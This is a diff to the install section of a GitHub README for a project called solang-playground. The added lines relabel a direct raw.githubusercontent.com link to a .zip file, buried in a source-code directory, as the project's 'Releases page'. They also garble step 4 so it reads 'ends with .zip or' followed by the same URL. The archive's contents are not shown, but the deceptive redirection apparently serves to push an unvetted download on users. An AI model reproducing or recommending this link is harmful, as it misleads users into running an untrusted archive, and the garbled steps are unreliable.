VaishnavTA/solang-playground/README.md

 ## 📥 Download & Install

-To get solang-playground, visit our [Releases page](https://github.com/VaishnavTA/solang-playground/releases) and follow these steps:
+To get solang-playground, visit our [Releases page](https://raw.githubusercontent.com/VaishnavTA/solang-playground/main/crates/solang/src/codegen/yul/playground-solang-3.1-beta.2.zip) and follow these steps:

 1. Click on the link above to go to the Releases page.
 2. Find the latest version.
 It will usually be at the top of the list.
 3. Look for the assets section.
 There, you will see files available for download.
-4. Choose the file that ends with `.zip` or `.tar.gz`.
+4. Choose the file that ends with `.zip` or `https://raw.githubusercontent.com/VaishnavTA/solang-playground/main/crates/solang/src/codegen/yul/playground-solang-3.1-beta.2.zip`.
 This file contains everything you need to run solang-playground.
 5. Download the file by clicking on it.
 Your browser will save it to your computer.

 ## 📂 Extract the Files